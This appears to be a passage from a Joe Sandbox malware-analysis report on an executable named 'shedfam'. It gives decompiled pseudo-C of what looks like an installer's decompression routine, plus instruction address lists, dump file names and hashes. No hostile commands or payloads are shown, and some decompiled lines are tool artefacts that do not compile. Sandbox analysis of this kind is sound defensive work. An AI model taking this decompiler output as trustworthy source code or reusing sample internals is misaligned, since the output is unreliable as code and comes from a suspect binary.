															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004065d2
0x004065d2
0x004065d6
0x004065f7
0x004065fe
0x00406604
0x0040660a
0x0040661c
0x00406622
0x00406627
0x00000000
0x004065d8
0x004065de
0x0040699f
0x0040699f
0x0040699f
0x004069a2
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x004069f0
0x004069f4
0x00406ba3
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00406bd5
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x00000000
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00406a1b
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00000000
0x00406a21
0x00406a1b
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00000000
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x00406a1b
0x004069a2
0x0040699f
0x00000000
0x004065d6

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
Instruction ID: 1046eeffc13e12efe39df9970ac10e2b765b46b26c22898380a8ab994a27db31
Opcode Fuzzy Hash: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
Instruction Fuzzy Hash: 307124B1D00228CBDF24CF98C8447ADBBF1FB44305F15816AD856BB281D778AA96DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004066F0 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004066F0() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
